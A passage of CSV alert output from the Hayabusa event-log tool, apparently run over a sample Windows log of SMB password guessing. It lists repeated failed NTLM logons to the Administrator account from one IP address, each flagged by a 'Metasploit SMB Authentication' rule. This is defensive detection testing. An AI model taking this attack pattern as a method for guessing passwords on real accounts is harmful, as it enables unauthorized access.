SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtQQS61GYBm6WUUz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WxxawZZMhNCGHxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sKP8G2VgJlrr9LMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VvOsNQpk3c5p1FgK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7oz7NPh5Z8UrDPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvzNFOLBlBv98Do4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KJmYytO30Icc6Rb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zro3jLjFXWZ2o8VL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Z2J8VYeuxd9fKcG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXMjOKLfMex7OmMv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgbm3YeoGxCa22Il : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7MEstBFjiWhVE18 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8Y2kDEiMZWf0znn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: zBAFVgPIOyCvtdRs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s3pFhUcspF6lzQXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39LFXXW715pQoADC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: in4ewyxouUnxQzCQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOtV8CLIU6Mcw2ty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8NJqimhGrg9uhTh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XEWLTOY9magV0h6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Di1MZsJx52Bi8E6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22MdB2QodynfibkF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qojej3YITXvXJ6Pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: CLjbQ6timbdQoufd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aZgoAnGEFwXN88bQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZFWoL9XUMJdfNnY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x000TRnXfVtPAQSE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNHWWHDOpXQyNdrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1irbPdOoUfvq1MXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dCflbKOMPJRXQHsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zuy6nD4EXeGzEy5e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xkig4u0LIS9v3HMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94RbUrUcMf6VhP8A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: X9f7wCJ3wI9RmZTL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkVs1viGo4RxhFaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKMLt6t01vUDDq1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYSif8ADOkC8aInB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EpmraSe2sxFVupTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VPtfy3AxXpt9D3bx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRMOrE0Ba983q0Jv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQ0nkyTAeJt3dCpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2fdsRMU9SMm1KpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3kliEPBsbsYNI7yG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 9gEKFGsRvvlzulxR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M6oUbT8LvS7JNCq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E4dxHwRQVR7iBWa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VRygirU257VfFcR5 : IP Address: 192.168.198.149 : AuthPackage: 
